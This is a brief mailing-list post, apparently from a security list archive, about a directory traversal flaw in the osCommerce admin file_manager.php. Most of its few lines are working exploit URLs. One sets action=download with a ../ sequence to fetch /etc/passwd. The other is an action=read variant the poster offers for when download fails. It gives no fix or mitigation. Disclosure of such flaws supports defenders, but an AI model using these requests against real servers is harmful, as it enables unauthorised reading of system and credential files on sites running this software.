<<< Date Index >>>     <<< Thread Index >>>

osCommerce File Manager Directory Traversal Vulnerability




there is allready a post on this that have 
file_manager.php?action=download&filename=../../../../../../etc/passwd 
 
sometime the action=download doesn't work , so i tried action=read
/admin/file_manager.php?action=read&filename=../../../../